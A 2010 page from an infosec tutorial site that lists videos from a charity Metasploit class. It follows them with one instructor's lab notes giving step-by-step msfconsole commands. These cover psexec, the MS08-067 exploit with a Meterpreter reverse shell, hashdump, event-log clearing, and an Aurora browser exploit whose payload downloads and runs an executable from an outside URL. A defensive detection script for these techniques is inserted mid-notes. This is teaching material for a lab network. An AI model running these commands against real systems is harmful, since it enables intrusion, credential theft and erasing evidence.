Metasploit Class Videos (Hacking Illustrated Series InfoSec Tutorial Videos)

Metasploit Class Videos

On May 8th 2010 the Kentuckiana ISSA held a 7 hour Metasploit class at the Brown hotel in Louisville Ky. Proceeds from the class went to the Hackers For Charity Food for Work program. The instructors were David "ReL1K" Kennedy, Martin "PureHate" Bos, Elliott "Nullthreat" Cutright, Pwrcycle and Adrian "Irongeek" Crenshaw. Below are the videos of the event. I hope you enjoy them, and if you do please consider donating to Johnny Long's organization. This should be more Metasploit than you can stand!

Note: For best viewing download the AVIs, the streaming versions are not as high quality.

1 Metasploit Intro - Irongeek

Download video:

http://www.archive.org/download/LouisvilleMetasploitClass/1MetasploitIntro-Irongeek.avi

Slides can be found at:

http://www.irongeek.com/downloads/metasploit-intro.pdf



2 Metasploit Scanning and Pivoting - Pwrcycle

Download video:

http://www.archive.org/download/LouisvilleMetasploitClass/2MetasploitScanningAndPivoting-Pwrcycle.avi

Slides can be found at:

http://cafecode.com/metasploit/



3 Metasploit Fuzzing and Exploit Development - Nullthreat



Download video:

http://www.archive.org/download/LouisvilleMetasploitClass/3MetasploitFuzzingAndExploitDevelopment-Nullthreat.avi

Slides can be found at:

http://www.nullthreat.net



4 Meterpreter and Post Exploitation (and a demo of Metasploit Express) - Purehate



Download video:

http://www.archive.org/download/LouisvilleMetasploitClass/4MeterpreterAndPostExploitation-Purehate.avi

Slides can be found at:

http://bit.ly/d8QZwR



5 Social Engineering Toolkit - ReL1K

Download video:

http://www.archive.org/download/LouisvilleMetasploitClass/5SocialEngineeringToolkit-Rel1k.avi



6 More Encoding Fun, Fasttrack and Closing - ReL1K



Download video:

http://www.archive.org/download/LouisvilleMetasploitClass/6MoreEncodingFasttrackAndClosing-Rel1k.avi

Slides can be found at:

http://www.secmaniac.com (whenever Dave puts them out there :) )

Websites of the groups and people involved in setting up the class:

http://www.hackersforcharity.org

http://www.metasploit.com

http://www.issa-kentuckiana.org

http://www.offensive-security.com

http://www.secmaniac.com

http://tools.question-defense.com

http://www.nullthreat.net

http://indysec.blogspot.com/

http://irongeek.com

What follows are the class notes for Adrian's section:

Metasploit Intro: Class Notes

This sheet is meant to be a convenient set of notes for the exercises Adrian will be demonstrating in class. These are the commands used in the demos for your reference, along with why they were used. Items in blue are things you type, green are things you click, gray is something optional that you may want to play with later and red is just to grab your attention.

--------------------------------------------------------

Exercise 0: Getting into BackTrack 4

--------------------------------------------------------

Login with "root" as the user name and "toor" as the password. So we can more easily get around, we will also start up X windows:

startx

Then, since the network starts off as disabled (a good idea so as not to announce yourself on the network till you are ready), let's bring it up and note our IP:

/etc/init.d/networking start

ifconfig

--------------------------------------------------------

Exercise 0.5: Login to XP

--------------------------------------------------------

Log in with "IndySploit" as the user name and "password" as the password. Then note our IP (students will not need to do this step unless they brought their own XP VM):

ipconfig

--------------------------------------------------------

Exercise 1: A few simple commands for Metasploit in BT4

--------------------------------------------------------

I plan to point these commands out, but not run them to completion.



Grab the latest Metasploit modules:

msfupdate

If you want to script some stuff later, look into:

msfcli | less

There is also the GUI, but we will not be using it in class:

msfgui

--------------------------------------------------------

Exercise 2: Let's Demo Metasploit MSFWeb interface in BT4

--------------------------------------------------------



To start off easy let's use the web interface. It is not as well supported as msfconsole, but it's prettier to show management the ease of exploitation (the ampersand is there so we can keep typing commands at the shell):

msfweb &

Now let's start Firefox and go to:

http://127.0.0.1:55555

You will most likely have to disable NoScript to get the web interface to work correctly.



Now that we have the web interface up, let's look for a module to use. Click "Exploit", and in the search bar enter:

psexec

On the list that comes up, choose "Microsoft Windows Authenticated User Code Execution", "Automatic" and for payload choose "windows/vncinject/reverse_tcp".



For the RHOST enter the IP of the XP box. SMB Password and SMB User are "password" and "IndySploit" respectively. For LHOST enter the BT4 box's IP. Now clicking the "Launch Exploit" button should be all we need to do to get a lovely VNC session.



--------------------------------------------------------

Exercise 3: Let's use MSFConsole under BT4

--------------------------------------------------------

Fire up the MSFConsole:

msfconsole

Now note that you can type normal *nix commands from inside of MSFConsole:

ifconfig

When in doubt, scream and shout:

help

Also note, tab completion works.



Now in MSFWeb we did not use a real vulnerability (psexec really is a feature), so let's try an exploit this time. First let's find an exploit:

search netapi



Ok, we found one I want to use, let's find out more about it:

info windows/smb/ms08_067_netapi

Sounds good, let's use it:

use exploit/windows/smb/ms08_067_netapi

Now we need to set some options. We can use "set" to just set them this one time, or use "setg" so they stick around if we switch to another module. Use "back", "unset" or "unsetg" if you screw up and have a typo. Let's select a payload to use:

setg payload windows/meterpreter/reverse_tcp

We could also set an encoder to use, but this is optional:

set encoder x86/shikata_ga_nai

Ok, what options do we need to set?

show options

Anything else cool we can do to customize the pwnage?

show advanced

Ok, let's set some required options that don't already have defaults, fill in the items in brackets accordingly:

setg rhost <XP box's IP>

setg lhost <BT4 box's IP>

Now let's tell Metasploit to fire off the exploit, and see if things work:

exploit

If that worked, we should have a Meterpreter session. Martin will talk more on Meterpreter later, but here are a few commands to try:

<We are now in Meterpreter>

Get some help:

help

Let's get some info about the system:

sysinfo

Get a command prompt on the exploited box:

shell

exit

Get back to the MSFConsole prompt:

background

<We are now out of Meterpreter>

Ok, what sessions are there?

help sessions

sessions

Ok, let's get back into our Meterpreter session:

sessions -i 1

<We are now in Meterpreter>

We will try to run a command on the remote box, and see it in the process list:

execute -f notepad.exe

ps

Grab some hashes:

hashdump

Clear the event log:

clearev

Run a Meterpreter script:

run scraper

A bunch of nifty stuff should now be in /root/.msf3/logs/scraper/

If you have updated to the latest version, this is also a fun command:

screenshot
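The two exercises above leave footprints a defender can look for: the psexec module in Exercise 2 authenticates over SMB and installs a short-lived service to run its payload, and clearev in Exercise 3 wipes the event logs. The script below is an added example written for these notes (it is not part of Adrian's notes or of Metasploit) that runs simple detection logic over a handful of constructed event records. The record layout, the host name XPBOX, the addresses and the service/file names are all made up for the example; the event IDs are the Vista-and-later numbers (4624 network logon, 7045 service installed, 1102 audit log cleared), and the comments note the XP-era equivalents where they differ.

```python
"""Added example: detection logic for remote service execution (psexec-style)
and event log clearing. Not part of the original class notes or of Metasploit."""
import re
from collections import defaultdict

# Constructed sample records (hypothetical host, addresses, names) in a simplified
# layout standing in for Windows event log fields. Event IDs are Vista and later;
# an XP/2003 host would log 540 (network logon) and 517 (audit log cleared)
# instead of 4624 and 1102. 7045 (service installed) exists on both.
SAMPLE_EVENTS = [
    {"t": 100, "log": "Security", "id": 4624, "host": "XPBOX", "user": "IndySploit",
     "logon_type": 3, "src_ip": "192.168.1.10"},
    {"t": 102, "log": "System", "id": 7045, "host": "XPBOX", "user": "IndySploit",
     "service_name": "MwkQzPAq", "image_path": r"\\127.0.0.1\ADMIN$\kLqrTs.exe"},
    {"t": 400, "log": "System", "id": 7045, "host": "XPBOX", "user": "SYSTEM",
     "service_name": "Spooler", "image_path": r"C:\WINDOWS\system32\spoolsv.exe"},
    {"t": 650, "log": "Security", "id": 1102, "host": "XPBOX", "user": "IndySploit"},
]

# Heuristic: an 8-letter name with no digits or separators, which is not how
# legitimate services tend to be named.
RANDOM_NAME = re.compile(r"^[A-Za-z]{8}$")
# A service binary dropped on the ADMIN$ share and referenced by UNC path.
ADMIN_SHARE = re.compile(r"^\\\\[^\\]+\\ADMIN\$\\", re.IGNORECASE)
WINDOW = 60  # seconds between a network logon and a service install to correlate


def looks_random(name):
    """True for names like 'MwkQzPAq': 8 letters with frequent case switches."""
    if not RANDOM_NAME.match(name):
        return False
    switches = sum(1 for a, b in zip(name, name[1:]) if a.islower() != b.islower())
    return switches >= 3


def remote_service_installs(events):
    """Flag service installs (7045) that reference ADMIN$, carry a random-looking
    name, or follow a network logon (4624, type 3) on the same host within WINDOW."""
    logons = defaultdict(list)  # host -> network logon events seen so far
    alerts = []
    for e in sorted(events, key=lambda ev: ev["t"]):
        if e["id"] == 4624 and e.get("logon_type") == 3:
            logons[e["host"]].append(e)
        elif e["id"] == 7045:
            recent = [l for l in logons[e["host"]] if 0 <= e["t"] - l["t"] <= WINDOW]
            reasons = []
            if ADMIN_SHARE.match(e["image_path"]):
                reasons.append("service binary served from ADMIN$ share")
            if looks_random(e["service_name"]):
                reasons.append("random-looking service name")
            if recent:
                reasons.append("preceded by network logon from %s" % recent[-1]["src_ip"])
            if reasons:
                alerts.append({"rule": "remote_service_install", "host": e["host"],
                               "t": e["t"], "service": e["service_name"],
                               "reasons": reasons})
    return alerts


def log_cleared(events):
    """Flag audit log clearing (1102 on Vista+, 517 on XP/2003)."""
    return [{"rule": "event_log_cleared", "host": e["host"], "t": e["t"],
             "user": e.get("user")} for e in events if e["id"] in (1102, 517)]


def analyze(events):
    """Run all rules and return alerts in time order."""
    return sorted(remote_service_installs(events) + log_cleared(events),
                  key=lambda a: a["t"])


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

Run against the constructed records it raises two alerts: the service install at t=102 (all three reasons fire) and the log clearing at t=650, while the Spooler install at t=400 passes because it is a normal name, a local path, and well outside the logon window. The log-cleared rule is the simplest and most reliable of the three; clearing is itself the last event written to the fresh log, so a collector that forwards events off the box before clearev runs still keeps everything that came before it.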

--------------------------------------------------------

Exercise 4: Extra credit, start a server on your box and do a drive by browser exploit

--------------------------------------------------------

(You will need to have an Internet connection, use msfupdate to get the latest modules, and have a webcam hooked up to the exploited box. Or you could just modify these commands to work for your circumstances.)



Under BT4 VM:

msfconsole

use exploit/windows/browser/ms10_002_aurora

set uripath pwnme

set payload windows/download_exec

set url http://irongeek.com/temp/camserver.exe

exploit

On the XP box, web surf to: http://<ip of BT4 box>:8080/pwnme

Under BT4, web surf to: http://<ip of XP box>

Useful Links:

http://www.offensive-security.com/metasploit-unleashed/

http://www.irongeek.com/

http://www.secmaniac.com/

http://tools.question-defense.com

http://www.room362.com/

http://www.darkoperator.com/meterpreter/

http://www.isd-podcast.com/




